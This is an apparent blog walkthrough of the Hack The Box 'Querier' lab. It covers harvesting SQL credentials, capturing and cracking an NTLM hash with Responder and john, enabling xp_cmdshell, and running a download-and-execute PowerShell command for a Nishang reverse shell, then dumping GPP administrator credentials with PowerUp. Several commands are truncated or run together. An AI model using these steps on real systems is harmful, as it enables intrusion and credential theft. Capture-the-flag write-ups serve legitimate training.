HTB – Querier Walkthrough


SMB Shares

Get the file and unzip it

SQL credentials found in vbaProject.bin

Use Impacket’s mssqlclient scipt to login

Try to enable xm_cmdshell but the current user is not privileged

Try to steal credentials by calling a fake share on your own server

Listen with responder

Crack the hash with john

Login again as the new user mssql-svc@ -db volume -windows-auth

Enable xp_cmdshell and now we have an RCE

Download Nishang Reverse shell from your own box with powershell command to get a reverse shell
Add the following command at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444

 Now execute the command on mssql to get a reverse shell
EXEC xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\”\”)

Privilege Escalation
Get the PowerUp.ps1 scipt to your own boxwget
Then send it to Windows box:
Invoke-WebRequest -OutFile c:\users\mssql-svc\downloads\PowerUp.ps1

Run the script
Import-Module .\PowerUp.ps1. .\PowerUp.ps1Invoke-AllChecks

 it will give us clear text credentials form GPP cache Administrator:’MyUnclesAreMarioAndLuigi!!1!’@

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.